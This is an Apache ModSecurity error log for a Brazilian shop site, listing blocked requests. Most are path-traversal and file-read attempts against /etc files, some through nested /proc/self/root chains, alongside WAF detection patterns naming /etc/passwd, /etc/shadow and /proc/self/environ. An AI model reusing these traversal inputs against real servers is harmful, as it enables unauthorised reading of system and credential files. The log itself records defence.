[Fri Mar 20 10:48:20.228577 2026] [:error] [pid 15826:tid 140411691570944] [client 57.141.18.31:33116] [client 57.141.18.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/krb5.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1QJOoXxyEfFpUF8f-j0wAAAUY"]
[Fri Mar 20 10:48:22.612467 2026] [:error] [pid 15826:tid 140411683178240] [client 57.141.18.114:33226] [client 57.141.18.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/percona-server.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1QJuoXxyEfFpUF8f-j2AAAAUc"]
[Fri Mar 20 10:48:23.340251 2026] [:error] [pid 15826:tid 140411565680384] [client 57.141.18.14:33358] [client 57.141.18.14] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/exports"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1QJ-oXxyEfFpUF8f-j2QAAAVU"]
[Fri Mar 20 10:48:32.211454 2026] [:error] [pid 21219:tid 140411674785536] [client 74.7.243.128:58662] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1QMPXLqtnMIWvjpaK_HgAAAog"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:48:38.742861 2026] [:error] [pid 7893:tid 140411708356352] [client 57.141.18.6:34372] [client 57.141.18.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sestatus.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1QNRCii7xarUs8iHaOKwAAAgQ"]
[Fri Mar 20 10:48:38.757319 2026] [:error] [pid 10189:tid 140411557287680] [client 57.141.18.25:34386] [client 57.141.18.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/motd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1QNjJ3M9BSuKP7CAZIJwAAAJY"]
[Fri Mar 20 10:48:40.530261 2026] [:error] [pid 10189:tid 140411590858496] [client 57.141.18.33:34504] [client 57.141.18.33] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1QODJ3M9BSuKP7CAZILAAAAJI"]
[Fri Mar 20 10:48:44.329778 2026] [mime_magic:error] [pid 11642:tid 140411624429312] (70014)End of file found: [client 57.141.18.79:34720] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:48:52.455105 2026] [:error] [pid 7235:tid 140411599251200] [client 57.141.18.1:35192] [client 57.141.18.1] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1QRPqxLDW4GITHUkQNUgAAARE"]
[Fri Mar 20 10:48:55.179881 2026] [:error] [pid 9818:tid 140411548894976] [client 57.141.18.20:35202] [client 57.141.18.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mailcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1QR11pVZ5mVmJwsFNTOQAAAFc"]
[Fri Mar 20 10:49:11.387760 2026] [:error] [pid 11642:tid 140411674785536] [client 57.141.18.81:35730] [client 57.141.18.81] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/redhat-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1QV7ninkcc-iUj5AqBfwAAA4g"]
[Fri Mar 20 10:49:14.180059 2026] [:error] [pid 26799:tid 140411716749056] [client 57.141.18.62:35782] [client 57.141.18.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1QWda6ubjKNq_cu4b9xQAAA0M"]
[Fri Mar 20 10:49:15.986106 2026] [:error] [pid 31215:tid 140411649607424] [client 74.7.228.61:60972] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1QWwF0L0L-SsrnPo6MrgAAAss"]
[Fri Mar 20 10:49:21.499130 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.243.128:35512] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1QYeoXxyEfFpUF8f-kQQAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:49:26.275086 2026] [:error] [pid 9818:tid 140411565680384] [client 74.7.243.128:39462] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1QY11pVZ5mVmJwsFNTVgAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:49:28.617784 2026] [mime_magic:error] [pid 7235:tid 140411674785536] (70014)End of file found: [client 216.73.216.191:36394] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:49:34.747733 2026] [:error] [pid 11642:tid 140411708356352] [client 74.7.243.128:39466] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Qbrninkcc-iUj5AqBnAAAA4Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 10:49:35.263527 2026] [mime_magic:error] [pid 10189:tid 140411733534464] (70014)End of file found: [client 216.73.216.191:36840] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:49:37.981087 2026] [mime_magic:error] [pid 10189:tid 140411666392832] (70014)End of file found: [client 57.141.18.75:36948] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:49:40.173168 2026] [:error] [pid 15826:tid 140411649607424] [client 57.141.18.96:37090] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crypttab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1Qc-oXxyEfFpUF8f-kSwAAAUs"]
[Fri Mar 20 10:49:47.770923 2026] [:error] [pid 15826:tid 140411582465792] [client 216.73.216.191:38483] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1Qe-oXxyEfFpUF8f-kUwAAAVM"]
[Fri Mar 20 10:49:47.803412 2026] [:error] [pid 15826:tid 140411616036608] [client 216.73.216.191:1092] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1Qe-oXxyEfFpUF8f-kVAAAAU8"]
[Fri Mar 20 10:49:47.912127 2026] [:error] [pid 15826:tid 140411708356352] [client 216.73.216.191:38483] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vimrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1Qe-oXxyEfFpUF8f-kVQAAAUQ"]
[Fri Mar 20 10:49:47.931814 2026] [:error] [pid 7235:tid 140411683178240] [client 216.73.216.191:14578] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyncd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1Qe_qxLDW4GITHUkQNjAAAAQc"]
[Fri Mar 20 10:49:48.217472 2026] [:error] [pid 21219:tid 140411674785536] [client 216.73.216.191:37592] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1QfPXLqtnMIWvjpaK_ewAAAog"]
[Fri Mar 20 10:49:50.139511 2026] [:error] [pid 9818:tid 140411548894976] [client 216.73.216.191:37602] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1Qfl1pVZ5mVmJwsFNTawAAAFc"]
[Fri Mar 20 10:49:51.441500 2026] [:error] [pid 11642:tid 140411557287680] [client 216.73.216.191:37840] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1Qf7ninkcc-iUj5AqBqgAAA5Y"]
[Fri Mar 20 10:49:53.100821 2026] [:error] [pid 26799:tid 140411716749056] [client 57.141.18.27:37972] [client 57.141.18.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1Qgda6ubjKNq_cu4b96QAAA0M"]
[Fri Mar 20 10:49:56.633523 2026] [:error] [pid 7235:tid 140411674785536] [client 57.141.18.53:38256] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1QhPqxLDW4GITHUkQNpAAAAQg"]
[Fri Mar 20 10:49:58.135007 2026] [:error] [pid 10189:tid 140411741927168] [client 57.141.18.84:38372] [client 57.141.18.84] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.cache"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1QhjJ3M9BSuKP7CAZIoQAAAIA"]
[Fri Mar 20 10:50:00.671129 2026] [:error] [pid 26799:tid 140411699963648] [client 216.73.216.191:38558] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1QiNa6ubjKNq_cu4b9-gAAA0U"]
